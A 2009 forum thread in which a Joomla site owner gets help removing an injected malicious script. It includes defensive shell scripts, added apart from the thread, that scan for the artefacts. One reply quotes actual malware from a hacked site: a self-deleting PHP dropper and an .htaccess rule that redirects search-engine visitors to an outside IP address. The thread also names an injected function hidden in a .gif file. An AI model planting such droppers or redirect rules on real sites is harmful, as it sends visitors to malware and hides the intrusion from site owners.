Geekzone: technology news, blogs, forums
dpw

dpw

843 posts

Ultimate Geek

ID Verified
Trusted

#30877 24-Feb-2009 14:59

Hi folks,

Please excuse me if this message sounds curt in any way. I am getting horribly frustrated with PHP and Joomla - most probably due to my lack of knowledge in the subject matters. It's doing my head in!

It seems one of the sites I created a few years ago has been compromised. There is now an obfuscated javascript snippet at the bottom of each page. I have no idea where this snippet is coming from but some AV software reports it as a Trojan. I'm guessing this links to some malware site somewhere.

The website in question - www.bernesemountaindog.co.nz - has just been upgraded with a full set of 1.0.15 files. I exported the DB through PhpMyAdmin and a scan through the generated SQL revealed no similar content in the DB. I had a look at the template's index.php and nothing there either. I don't know Joomla or PHP enough to look further unfortunately.

I am posting it in this forum for lack of a more appropriate sounding one. Please folks - I'm sure there're some PHP or Joomla gurus out there. Any assistance would be greatly appreciated!

Cheers,
Dany.




Android user, software developer, a semi-typical (not a gamer) geek, and a Bernese Mountain Dog nut!

http://savitarbernese.com | https://nz.linkedin.com/in/danywu


casper021
96 posts

Master Geek


  #197762 24-Feb-2009 15:41

You have a problem: your website has been injected with the Yahoo counter script.

Look for the following line in your pages, which is the beginning of the script:

script language=javascript><!-- Yahoo! Counter starts

Also I would recommend taking the website down as it will infect your website visitors.

There are a number of ways to fix it; you can google "script language=javascript><!-- Yahoo! Counter starts"

What I would recommend is the following:

1) Take the website down (you can set it to offline in Joomla).
2) Copy all the files to your PC at home.
3) Run a search on all files for the script (I think it mainly infects index.* and home.* and default.* files but I may be wrong on this one).
4) Remove all the script injections from all the files (note the names of the files you have modified).
5) Reupload the files back to the server.
6) Change the permission on the files you modified above to 644.

I hope this will help. Also, if the files are executable, like script files, you may need to set them to 744.





dpw

dpw

843 posts

Ultimate Geek

ID Verified
Trusted

  #197764 24-Feb-2009 15:53

This is what's bugging me - I've searched with a couple of tools but nothing returned. I have taken the site down for now and yes, I already downloaded a copy of the site and its DB.

I'm about to do another search through the files. Just to confirm, this command, executed from the root of the site's folder:

grep -R "Yahoo! Counter" *

should look for what I want, right?

D.






casper021
96 posts

Master Geek


  #197773 24-Feb-2009 16:44

Yep, if you're running Linux, grep -R "Yahoo! Counter" * should do the job, or even
grep -R "Yahoo" ./*

Well, earlier I had a look at the source of your main page just by going to View Source in Firefox, and I could see the script at the bottom.

Who is your webhost?

Also, the other option is to do a diff between your files and a clean Joomla download.

Also have a look at your webhosting folder for the following files:

m.php

rename("ht",".htaccess");
unlink("m.php");
echo "OK";

and ht

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://87.248.180.89/topic.html?s=s [R,L]

I think they might also have something to do with it.

If you find them, just rename them and see if it will fix your problem.
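
Added example (not part of the thread): a shell check for the two artefacts casper021 describes, listing .htaccess or staged "ht" files that redirect by Referer, and PHP files that rename something to .htaccess. The function names, the sample tree and the redirect.example.invalid host are constructed for illustration.

```shell
#!/bin/sh
# Added example, not code from the thread. Names and sample data are constructed.

# List .htaccess (or staged "ht") files under $1 that contain BOTH a RewriteCond
# on HTTP_REFERER and a RewriteRule whose target is an absolute URL.
find_referer_redirects() {
    find "$1" -type f \( -name '.htaccess' -o -name 'ht' \) \
        -exec grep -Eiq '^[[:space:]]*RewriteCond[[:space:]]+%\{HTTP_REFERER\}' {} \; \
        -exec grep -Eil '^[[:space:]]*RewriteRule[[:space:]]+[^[:space:]]+[[:space:]]+https?://' {} \;
}

# Heuristic: list PHP files under $1 that rename() something to .htaccess,
# as the m.php quoted above does.
find_htaccess_droppers() {
    find "$1" -type f -name '*.php' \
        -exec grep -El 'rename[[:space:]]*\(.*\.htaccess' {} \;
}

# Build a constructed sample tree: one benign site and one tampered site.
make_sample_site() {
    d=$(mktemp -d)
    mkdir -p "$d/clean" "$d/hacked"
    printf '%s\n' 'RewriteEngine On' \
        'RewriteCond %{REQUEST_FILENAME} !-f' \
        'RewriteRule (.*) index.php' > "$d/clean/.htaccess"
    printf '%s\n' 'RewriteEngine On' \
        'RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]' \
        'RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]' \
        'RewriteRule .* http://redirect.example.invalid/topic.html [R,L]' \
        > "$d/hacked/.htaccess"
    printf '%s\n' '<?php rename("ht",".htaccess"); unlink("m.php"); echo "OK";' \
        > "$d/hacked/m.php"
    echo "$d"
}

# Demo run on the constructed tree; only the tampered files are listed.
site=$(make_sample_site)
find_referer_redirects "$site"
find_htaccess_droppers "$site"
rm -rf "$site"
```

On a real copy of the site, pass the download directory instead of the sample tree and compare any hit against the .htaccess shipped with the clean install.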




dpw

dpw

843 posts

Ultimate Geek

ID Verified
Trusted

  #197820 24-Feb-2009 19:42

Thanks, I can't find the file m.php anywhere, and I'm not using .htaccess in my folders - everything is probably inherited from the parent directory. Are you suggesting I should create one with that content?

My webhost is kiwihosting.net







casper021
96 posts

Master Geek


  #197874 24-Feb-2009 22:54

No no no no, do not create one, as this is an example of a hacked one, coz one of my Joomla websites has been injected with JavaScript and that was one of the things I found during my investigation.

gabba
85 posts

Master Geek

Trusted

  #198086 25-Feb-2009 20:54

Hi

Can't be much help sorry, but if you have not already, then the Joomla security thread is a good read (for 1.0.15):

http://forum.joomla.org/viewforum.php?f=267

esp. the security checklist

...but in the spirit of TRYING to help, you might find some more info here (or try a search in the Joomla forums - there appears to be a bit there):

http://forum.joomla.org/viewtopic.php?p=1581519

Thanks for the headsup tho' I'm off to check my joomla sites.

Cheers

casper021
96 posts

Master Geek


  #198212 26-Feb-2009 13:11

Here is the final solution which seems to fix this issue:

1) Download your website to your computer.
2) Restore the .htaccess file to the original one from the original install, or if you are not using it just delete it or delete everything from it.
3) Do a search through your website files for the following code: if(!function_exists('tmp_lkojfghx'))…
A good program to do it is wingrep. This code can be in any file or can be a separate file. In the website this post is referring to, it was found in the submenu-on1.gif file; this file was containing only one function.
4) Remove that function from your code or remove the file if it is in a separate file.
5) Reupload your new htaccess file and any other files you have modified.


That should fix it.

Good luck
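
Added example (not part of the thread): a shell version of the search in step 3 that looks in every file regardless of extension for the two markers quoted in this thread, and separately flags image-named files that contain PHP. The function names and the sample tree are constructed; the injected function body is a placeholder.

```shell
#!/bin/sh
# Added example, not code from the thread. Names and sample data are constructed.

# List every file under $1, whatever its extension, that contains one of the
# markers quoted in the thread.
find_injected_files() {
    grep -rlE -e 'Yahoo! Counter starts' \
              -e 'function_exists\([^)]*tmp_lkojfghx' "$1" | sort
}

# Heuristic: list files with an image extension that contain a PHP open tag
# or a function_exists( call; a genuine image should contain neither.
find_php_in_images() {
    find "$1" -type f \( -iname '*.gif' -o -iname '*.jpg' -o -iname '*.png' \) \
        -exec grep -El '<\?php|function_exists[[:space:]]*\(' {} \; | sort
}

# Build a constructed sample tree with one clean page, one clean image name,
# one injected page and one image-named file holding a placeholder function.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/images"
    printf '<?php echo "home"; ?>\n' > "$d/index.php"
    printf 'GIF89a-constructed-placeholder\n' > "$d/images/logo.gif"
    printf "<?php if(!function_exists('tmp_lkojfghx')){ /* placeholder */ } ?>\n" \
        > "$d/images/submenu-on1.gif"
    printf '<html><script language=javascript><!-- Yahoo! Counter starts\n</script></html>\n' \
        > "$d/home.html"
    echo "$d"
}

# Demo run on the constructed tree.
tree=$(make_sample_tree)
find_injected_files "$tree"
find_php_in_images "$tree"
rm -rf "$tree"
```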


 
 
 


dpw

dpw

843 posts

Ultimate Geek

ID Verified
Trusted

  #198215 26-Feb-2009 13:27

casper021:

Here is the final solution which seems to fix this issue:

1) Download your website to your computer.
2) Restore the .htaccess file to the original one from the original install, or if you are not using it just delete it or delete everything from it.
3) Do a search through your website files for the following code: if(!function_exists('tmp_lkojfghx'))…
A good program to do it is wingrep. This code can be in any file or can be a separate file. In the website this post is referring to, it was found in the submenu-on1.gif file; this file was containing only one function.
4) Remove that function from your code or remove the file if it is in a separate file.
5) Reupload your new htaccess file and any other files you have modified.



Thanks Casper - that has fixed it for now. I'll be interested in hearing how the code in a gif-prefixed file gets executed though!

D.





